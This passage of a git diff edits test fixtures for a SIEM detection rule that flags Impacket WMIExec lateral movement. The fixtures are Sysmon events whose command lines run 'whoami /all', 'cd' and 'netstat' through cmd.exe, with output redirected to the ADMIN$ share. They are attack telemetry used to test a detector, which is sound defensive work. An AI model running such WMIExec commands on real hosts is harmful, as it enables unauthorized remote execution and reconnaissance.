"object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", 
"object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.485Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.168Z", "type": "raw", "uuid": "4d37a299-56f3-4a2b-8d40-da1fcccbc1ad"} -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "cd \\"} +expect 1 {"action": "execute", "alert.context": "Executed command: cd \\ via WMIExec", "category.generic": "Attack", "category.high": "Lateral Movement", "category.low": "Remote Services: Distributed Component Object Model", "correlation_name": "Impacket_WMIExec_Command_Executed", "correlation_type": 
"incident", "datafield1": "cd \\", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Impacket_WMIExec_Command_Executed|iewin7|cmd.exe /q /c cd \\ 1> \\\\127.0.0.1\\admin$\\__1556656369.7 2>&1", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-00105f321d00", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "3840", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", 
"subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc index 12d14c6e..72025228 100644 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc +++ b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_2.sc 
@@ -1,3 +1,3 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.2467140Z\"},\"EventRecordID\":\"9827\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.246\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010b1361d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2504\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c cd 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c cd 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": 
"365abb72-b0f3-5cc8-0000-0010b1361d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2504", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.246Z", "type": "raw", "uuid": "f57f1602-2465-478e-888f-03081c0e33cb"} +{"action": "start", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", 
"object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "cd "} +expect 1 {"action": "execute", "alert.context": "Executed command: whoami /all via WMIExec", "category.generic": "Attack", "category.high": "Lateral Movement", "category.low": "Remote Services: Distributed Component Object Model", "correlation_name": "Impacket_WMIExec_Command_Executed", "correlation_type": 
"incident", "datafield1": "whoami /all", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Impacket_WMIExec_Command_Executed|iewin7|cmd.exe /q /c whoami /all 1> \\\\127.0.0.1\\admin$\\__1556656369.7 2>&1", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "command", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", 
"subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc deleted file mode 100644 index 33d153ff..00000000 --- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_3.sc +++ /dev/null 
@@ -1,3 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c whoami /all 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", 
"object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} - -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": "whoami /all"} \ No newline at end of file 
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc
deleted file mode 100644
index b79fa353..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_lat_move/Impacket_WMIExec_Command_Executed/tests/test_4.sc
+++ /dev/null
@@ -1,4 +0,0 @@ -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-30T20:32:51.3248390Z\"},\"EventRecordID\":\"9828\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1964\",\"ThreadID\":\"1664\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-30 20:32:51.324\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-b0f3-5cc8-0000-0010c43a1d00}\"},{\"Name\":\"ProcessId\",\"text\":\"2828\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\"},{\"Name\":\"FileVersion\",\"text\":\"6.1.7601.17514 (win7sp1_rtm.101119-1850)\"},{\"Name\":\"Description\",\"text\":\"Windows Command Processor\"},{\"Name\":\"Product\",\"text\":\"Microsoft® Windows® Operating System\"},{\"Name\":\"Company\",\"text\":\"Microsoft Corporation\"},{\"Name\":\"CommandLine\",\"text\":\"cmd.exe /Q /c whoami /all 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\__1556656369.7 
2>&1\"},{\"Name\":\"CurrentDirectory\",\"text\":\"C:\\\\\"},{\"Name\":\"User\",\"text\":\"IEWIN7\\\\IEUser\"},{\"Name\":\"LogonGuid\",\"text\":\"{365abb72-b0f2-5cc8-0000-00203d311d00}\"},{\"Name\":\"LogonId\",\"text\":\"0x1d313d\"},{\"Name\":\"TerminalSessionId\",\"text\":\"0\"},{\"Name\":\"IntegrityLevel\",\"text\":\"High\"},{\"Name\":\"Hashes\",\"text\":\"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163\"},{\"Name\":\"ParentProcessGuid\",\"text\":\"{365abb72-b0c0-5cc8-0000-001017c31c00}\"},{\"Name\":\"ParentProcessId\",\"text\":\"836\"},{\"Name\":\"ParentImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\"},{\"Name\":\"ParentCommandLine\",\"text\":\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "365abb72-b0f2-5cc8-0000-00203d311d00", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "iewin7", "object.account.id": "synthetic:ieuser@iewin7", "object.account.name": "ieuser", "object.account.privileges": "High", "object.account.session_id": "1913149", "object.process.cmdline": "cmd.exe /Q /c netstat -tulpn > 1.txt | type 1.txt 1> \\\\127.0.0.1\\ADMIN$\\__1556656369.7 2>&1", "object.process.cwd": "C:\\", "object.process.fullpath": 
"c:\\windows\\system32\\cmd.exe", "object.process.guid": "365abb72-b0f3-5cc8-0000-0010c43a1d00", "object.process.hash.imphash": "CEEFB55F764020CC5C5F8F23349AB163", "object.process.hash.md5": "AD7B9C14083B52BC532FBA5948342B98", "object.process.hash.sha1": "EE8CBF12D87C4D388F09B4F69BED2E91682920B5", "object.process.hash.sha256": "17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE", "object.process.id": "2828", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.parent.cmdline": "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding", "object.process.parent.fullpath": "c:\\windows\\system32\\wbem\\wmiprvse.exe", "object.process.parent.guid": "365abb72-b0c0-5cc8-0000-001017c31c00", "object.process.parent.id": "836", "object.process.parent.name": "wmiprvse.exe", "object.process.parent.path": "c:\\windows\\system32\\wbem\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-14T08:42:34.486Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "synthetic:ieuser@iewin7", "subject.account.name": "ieuser", "subject.account.privileges": "High", "subject.account.session_id": "1913149", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-30T20:32:51.324Z", "type": "raw", "uuid": "96275d9e-aef9-45ba-8e2a-b13766c64ad8"} - -# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Impacket_WMIExec_Command_Executed", "datafield1": 